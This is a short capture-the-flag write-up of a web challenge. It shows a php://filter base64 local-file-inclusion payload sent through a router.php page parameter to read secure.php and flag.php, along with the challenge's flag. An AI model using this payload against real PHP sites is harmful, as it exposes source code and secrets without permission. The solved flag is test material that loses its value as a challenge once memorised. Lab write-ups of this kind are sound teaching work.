Currently, our website is facing a multitude of state-level cyberattacks, we have switched to our secure routing failover! Also we perform automated cleanups to prevent backdoors.
Flag format: CTF{sha256}
CTF{6305558cecd0053dfcde9dad8b7a7ea1a7d01dbdf3e2707af04875f874998ca7}
LFI to read the contents of flag.php
The first thing we see when opening up the website is:
Currently, our website is facing a multitude of state-level cyberattacks, we have switched to our secure routing failover!
If you attempt to bruteforce, you will not solve this chall.
Also we perform automated cleanups to prevent backdoors.
We then notice the URL:
http://34.107.115.255:30449/router.php?page=secure.php
The URL has a ?page parameter on it, which points to the current page. This just screamed for LFI. I tried modifying this parameter, and tried to see if I could read the contents of secure.php
php://filter/convert.base64-encode/resource=secure.php
After making this request, I got the php page encoded in b64:
PD9waHAKCmVjaG8gIkN1cnJlbnRseSwgb3VyIHdlYnNpdGUgaXMgZmFjaW5nIGEgbXVsdGl0dWRlIG9mIHN0YXRlLWxldmVsIGN5YmVyYXR0YWNrcywgd2UgaGF2ZSBzd2l0Y2hlZCB0byBvdXIgc2VjdXJlIHJvdXRpbmcgZmFpbG92ZXIhPGJyPiI7CmVjaG8gIklmIHlvdSBhdHRlbXB0IHRvIGJydXRlZm9yY2UsIHlvdSB3aWxsIG5vdCBzb2x2ZSB0aGlzIGNoYWxsLjxicj4iOwplY2hvICJBbHNvIHdlIHBlcmZvcm0gYXV0b21hdGVkIGNsZWFudXBzIHRvIHByZXZlbnQgYmFja2Rvb3JzLjxicj4iOwo/Pg==
It’s decoded content wasn’t interesting, but I tried the same trick on flag.php.
http://34.107.115.255:30449/router.php?page=php://filter/convert.base64-encode/resource=flag.php